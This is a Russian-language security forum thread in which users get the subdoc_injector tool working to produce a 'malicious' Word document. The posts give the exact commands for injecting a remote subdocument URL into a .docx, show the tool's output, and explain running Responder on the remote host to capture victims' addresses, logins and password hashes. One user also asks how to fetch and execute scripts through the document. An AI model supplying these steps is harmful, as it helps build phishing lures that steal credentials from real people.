• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Инструмент subdoc_injector

Dimon_Any

Green Team
11.01.2018
46
21
BIT
0
Всем привет) Есть такой инструмент Subdoc injector для создания вредоносного Word документа
RhinoSecurityLabs/Security-Research

У меня не получается его запустить, не пойму какие параметры указывать, нашел в инете что надо писать
python subdoc_injector.py -i mydoc.docx -o infected.docx -u ///127.0.0.1/subdoctest -d 100

но это тоже не запускается, вываливается с ошибкой синтаксиса(( может кто помочь? форум полистал, такого не нашел

Есть конечно и другой ручной способ создания такого документа, но при запуске ворда видна "вредная" ссылка.... а писали что этот инструмент делает так, что этой ссылки не видно
 

Dimon_Any

Green Team
11.01.2018
46
21
BIT
0
Сори)) Я думал что кто то скачает себе файл и попробует, система без разницы какая, что на Винде что на Kali одна и таже ошибка.
Пробывал и параметры разные писать.
скр1.jpg скр2.jpg
 

rabbit_hole

Green Team
11.12.2018
14
11
BIT
0
ТС. не знаю, актуально тебе еще или нет.
затестил тулзу(эт громко сказано)

собсно слил с гита репу.
перешел в каталог с прогой.

на вызов
Код:
python ./subdoc_injector.py
получил
Код:
[!] xmltodict library not installed or found. Please install requirements
поставил модуль недостающий
Код:
pip install xmltodict
далее попробовал подсунуть ему обычный док с умной рожей :))
на что получил ошибку при распаковке :)
далее я скачал какой-то рандомный докх фаил из интернетов(наверняка с пейлоадом уже ;))) )
ссылку я приводить не буду, смысла не вижу.
потом все как в справке написанно прописал последовательно
Код:
python ./subdoc_injector.py -i demo.docx -o test.docx -u http://domain-example.com
в ответ на что получил
Код:
[+] Infecting demo.docx
[*] demo.docx has been injected and output is: test.docx

.а вот теперь обьясните мне, пожалуйста ;)
что должно висеть на другой стороне domain-example.com?

из хелпа
Код:
-u URL, --url URL     Domain pointed to HTTP_AUTH server. e.g.
                        https://domain.com/docs/target-UUID (default: None)

сразу каюсь - в код не ходил, ничего не читал.
как это работает и что происходит - тоже не ясно :))
 

rabbit_hole

Green Team
11.12.2018
14
11
BIT
0
сорри за дабл, снова капча меня нагибает, не обновить сообщение :(

ПС. совсем забыл, для ТСа версии
Код:
# lsb_release -d
Description:	Ubuntu 16.04.5 LTS

# python --version
Python 2.7.12


апд. заглянул в код, эксплуатирует frameset тег,

это насколько я своим умишком смог соотнести текст по линку и код.

новый вопрос :
если он подтягивает документ, можно ли как-то подтянуть и исполнить код?
vbs/js/ps/bat/etc :)
 
Последнее редактирование:

Dimon_Any

Green Team
11.01.2018
46
21
BIT
0
оО, кто то откликнулся)) давно чет не заходил)) Спасибо большое, щас время будет протестю еще раз, отпишусь))
 

Dimon_Any

Green Team
11.01.2018
46
21
BIT
0
блин, я лошара.... я гитхаба слил не исходный код, а какой то бред, даже не помню как так получилось, поэтому и не работало, щас внимательно стал разбираться на свежую голову)))
Вообщем прога запускается....
Так же требует недостающий модуль, только на Kali он называется python-xmltodict
По поводу другой стороны.... там должен быть запущен Responder который слушает интерфейс и получает данные адрес, логин и хэш пароля

только я с этой утилитой чет не понял темы, при открытии документа выскакивает окно ввода логина пароля, при вводе конечно данные прилетают, но кто на это поведется?
Просто при этой же атаке, только при "ручной" подготовки файла, не каких уч.данных не спрашивает, все само прилетает

в чем тогда смысл использования данной утилиты не понятен, если у кого то есть мысли по этому поводу, объясните))
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!